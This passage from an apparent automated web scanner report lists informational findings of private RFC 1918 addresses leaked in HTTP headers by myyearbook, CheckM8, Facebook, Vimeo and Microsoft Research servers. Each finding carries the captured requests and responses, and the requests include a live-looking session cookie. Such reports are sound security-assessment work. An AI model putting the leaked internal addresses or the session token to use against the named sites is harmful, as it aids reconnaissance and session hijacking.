Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Fri, 13 May 2011 21:27:25 GMT
ETag: "4112743019"
Content-Type: image/png
Accept-Ranges: bytes
Content-Length: 52000
Date: Thu, 21 Jul 2011 18:00:19 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:30:19 GMT
X-CDN: Cotendo
Connection: Keep-Alive

.PNG
.
...IHDR...l...s.....%.^B....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}......+M..^.k.{...`l:.%.B'!.7@....@.K.....!.0..B.%..{..6n...^...N.....4...].6..}.....st..)....`......;=E...\.....QH
...[SNIP]...

23.26. http://assets.myyearbook.com/nerve/css/nerve.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.myyearbook.com
Path:	/nerve/css/nerve.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.20.114

Request

GET /nerve/css/nerve.css?68769 HTTP/1.1
Host: assets.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____

Response

HTTP/1.1 200 OK
Content-Length: 624
Server: Cherokee
Last-Modified: Wed, 16 Feb 2011 12:10:58 GMT
Etag: "fabe3cc797d82cf92e7af93a9679bc5cc7d07b02"
Content-Type: text/css
X-MyPoolMember: 10.100.20.114
Accept-Ranges: bytes
Date: Thu, 21 Jul 2011 18:00:17 GMT
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:30:17 GMT
X-CDN: Cotendo
Connection: Keep-Alive

#NerveNotifications{position:fixed;top:0;margin-left:653px;z-index:5;+position:absolute;+top:72px;+right:0;+margin-left:0}.LiveLinkNotification_AcceptLink.pseudolink{font-weight:bold;color:#9CF}.LiveL
...[SNIP]...

23.27. http://assets.myyearbook.com/nerve/js/nerve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.myyearbook.com
Path:	/nerve/js/nerve.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.20.125

Request

GET /nerve/js/nerve.js?68769 HTTP/1.1
Host: assets.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____

Response

HTTP/1.1 200 OK
Content-Length: 12049
Server: Cherokee
Last-Modified: Wed, 16 Feb 2011 12:09:35 GMT
Etag: "a1a4a016eedbf280af250a1eb4da3f0b7d5c184d"
Content-Type: application/x-javascript
X-MyPoolMember: 10.100.20.125
Accept-Ranges: bytes
Date: Thu, 21 Jul 2011 18:00:20 GMT
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:30:20 GMT
X-CDN: Cotendo
Connection: Keep-Alive

// JSON2: http://www.JSON.org/json2.js
if(!this.JSON)this.JSON={};
(function(){function l(b){return b<10?"0"+b:b}function o(b){p.lastIndex=0;return p.test(b)?'"'+b.replace(p,function(f){var c=r[f];ret
...[SNIP]...

23.28. http://ch2lb.checkm8.com/adam/cm8_detect_ad.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ch2lb.checkm8.com
Path:	/adam/cm8_detect_ad.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.15

Request

GET /adam/cm8_detect_ad.js HTTP/1.1
Host: ch2lb.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Apache
P3P: policyref="http://ch2lb.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Age: 0
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Length: 16116
Connection: close
Content-Type: application/javascript

// All rights reserved CheckM8 Inc. (c) 2009

if (typeof(window.CM8Page) == "undefined") {
if (document.location && (document.location.search.indexOf('CM8Page=') != -1))
window.CM8Page=document
...[SNIP]...

23.29. http://ch2lb.checkm8.com/data/420913/presitial_SC_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ch2lb.checkm8.com
Path:	/data/420913/presitial_SC_logo.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.15

Request

GET /data/420913/presitial_SC_logo.gif HTTP/1.1
Host: ch2lb.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:11 GMT
Server: Apache
x-internal-hashed-uri: /data/420/420913/presitial_SC_logo.gif
P3P: policyref="http://ch2lb.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Last-Modified: Fri, 10 Dec 2010 00:04:42 GMT
Accept-Ranges: bytes
Content-Length: 3987
Cache-Control: max-age=3600
Expires: Fri, 22 Jul 2011 21:14:11 GMT
Connection: close
Content-Type: image/gif

GIF89a^.d........M<.M=.L;.WJ.K9.J9.L:.J8.H5.I7.QB.nf.I6.VI.G3.G4.C..G4.N>.F3.......cX.E1....f\.E0....F2.kb.D/.VH.F2.......]R.......F2.[O.zr.......h^..|..........un.P@................\P.G3....bX.......
...[SNIP]...

23.30. http://ch2lb.checkm8.com/data/442707/Nom_640x480.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ch2lb.checkm8.com
Path:	/data/442707/Nom_640x480.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.212.23

Request

GET /data/442707/Nom_640x480.gif HTTP/1.1
Host: ch2lb.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:11 GMT
Server: Apache
x-internal-hashed-uri: /data/442/442707/Nom_640x480.gif
P3P: policyref="http://ch2lb.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.23 ny-ad13
Last-Modified: Tue, 14 Jun 2011 13:59:02 GMT
Accept-Ranges: bytes
Content-Length: 40403
Cache-Control: max-age=3600
Expires: Fri, 22 Jul 2011 21:14:11 GMT
Connection: close
Content-Type: image/gif

GIF89a.......ZZ...................UU.......JL.}}....33cst....ee.==..........FF.**............. .!!...................--..................=GI................NN................ $Sde.....#. P_a29;i...
...[SNIP]...

23.31. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.207.119

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "0cbadb3c3b9cde8ee8aae06692f4051b"
X-FB-Server: 10.27.207.119
X-Cnection: close
Content-Length: 129658
Cache-Control: public, max-age=696
Expires: Thu, 21 Jul 2011 17:51:55 GMT
Date: Thu, 21 Jul 2011 17:40:19 GMT
Connection: close
Vary: Accept-Encoding

/*1311123715,169594743,JIT Construction: v407899,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.32. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.181.108

Request

GET /en_US/all.js?_=1311271116129 HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "0cbadb3c3b9cde8ee8aae06692f4051b"
X-FB-Server: 10.27.181.108
X-Cnection: close
Content-Length: 129658
Vary: Accept-Encoding
Cache-Control: public, max-age=1147
Expires: Thu, 21 Jul 2011 18:17:37 GMT
Date: Thu, 21 Jul 2011 17:58:30 GMT
Connection: close

/*1311271110,169588076,JIT Construction: v408827,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.33. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.120.129

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
If-None-Match: "0cbadb3c3b9cde8ee8aae06692f4051b"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "eedf452a47b8f3ab3dc2b0f41f6cf592"
X-FB-Server: 10.32.120.129
X-Cnection: close
Content-Length: 135471
Cache-Control: public, max-age=425
Expires: Fri, 22 Jul 2011 20:20:18 GMT
Date: Fri, 22 Jul 2011 20:13:13 GMT
Connection: close
Vary: Accept-Encoding

/*1311292244,169900161,JIT Construction: v409162,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.34. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.39.128

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1311185431/build/system/facebook.html

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "0cbadb3c3b9cde8ee8aae06692f4051b"
X-FB-Server: 10.28.39.128
X-Cnection: close
Content-Length: 129658
Cache-Control: public, max-age=961
Expires: Thu, 21 Jul 2011 19:41:00 GMT
Date: Thu, 21 Jul 2011 19:24:59 GMT
Connection: close
Vary: Accept-Encoding

/*1311123780,169617280,JIT Construction: v407899,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.35. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.22.108

Request

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "0cbadb3c3b9cde8ee8aae06692f4051b"
X-FB-Server: 10.33.22.108
X-Cnection: close
Content-Length: 129658
Cache-Control: public, max-age=453
Expires: Thu, 21 Jul 2011 16:21:03 GMT
Date: Thu, 21 Jul 2011 16:13:30 GMT
Connection: close
Vary: Accept-Encoding

/*1311122583,169940588,JIT Construction: v407899,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.36. http://games.myyearbook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.myyearbook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.236

Request

Response

23.37. http://games.myyearbook.com/landing/pool previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.myyearbook.com
Path:	/landing/pool

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.10.10.239

Request

Response

23.38. http://home.myyearbook.com/Countries previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/Countries

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.194

Request

Response

23.39. http://home.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.192

Request

GET /favicon.ico HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:17:44 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.192

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.40. http://home.myyearbook.com/feed/giftFeedItems previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/giftFeedItems

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.201

Request

Response

23.41. http://home.myyearbook.com/feed/myMagFeedItems previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/myMagFeedItems

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.194

Request

Response

23.42. http://home.myyearbook.com/feed/tvFeedItems previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/tvFeedItems

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.193

Request

Response

23.43. http://myyearbook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://myyearbook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.194

Request

GET / HTTP/1.1
Host: myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 21 Jul 2011 17:58:24 GMT
Server: Apache
Location: http://www.myyearbook.com/
Content-Length: 234
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.194

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.myyearbook.c
...[SNIP]...

23.44. http://player.vimeo.com/video/18305022 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/18305022

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.118

Request

Response

23.45. http://player.vimeo.com/video/25752549 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/25752549

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.116

Request

GET /video/25752549?title=0&byline=0&portrait=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: player.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.116
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7464
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>BIKE GUIDE</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><!
...[SNIP]...

23.46. http://player.vimeo.com/video/25752549 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/25752549

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.115

Request

Response

23.47. http://player.vimeo.com/video/26341323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/26341323

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.118

Request

Response

23.48. http://player.vimeo.com/video/8022406 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/8022406

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.120

Request

GET /video/8022406?title=0&byline=0&portrait=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: player.vimeo.com

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.120
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8005
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>The Ballad of Marshall Mcluhan</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opaci
...[SNIP]...

23.49. http://player.vimeo.com/video/8022406 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/8022406

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.90.128.115

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.115
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8381
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>The Ballad of Marshall Mcluhan</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opaci
...[SNIP]...

23.50. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.ak.fbcdn.net
Path:	/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif HTTP/1.1
Host: profile.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Length: 508
Content-Type: image/gif
Last-Modified: Fri, 01 Jul 2011 01:42:14 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Cache-Control: public, max-age=1209600
Expires: Thu, 04 Aug 2011 16:12:54 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

GIF89a2.2...............................................................................................................................................................................................
...[SNIP]...

23.51. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.ak.fbcdn.net
Path:	/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif HTTP/1.1
Host: profile.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

Response

HTTP/1.1 200 OK
Content-Length: 390
Content-Type: image/gif
Last-Modified: Fri, 01 Jul 2011 01:42:14 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=1209600
Expires: Thu, 04 Aug 2011 16:12:54 GMT
Date: Thu, 21 Jul 2011 16:12:54 GMT
Connection: close

GIF89a2.2....................................................................................................!.......,....2.2....`'.di.h..l.~p,.tm.x..|_...$.+....g. ..1.I.@...u..\{.....-..G.&@...Y.M.
...[SNIP]...

23.52. http://research.microsoft.com/en-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

23.53. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:52:47 GMT
Content-Length: 65589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...

23.54. http://research.microsoft.com/en-us/events/fs2011/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/fs2011/default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.13

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:53:34 GMT
Content-Length: 74950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...

23.55. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/events/fs2011/demofest.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.7.12

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:54:07 GMT
Content-Length: 88384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...

23.56. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

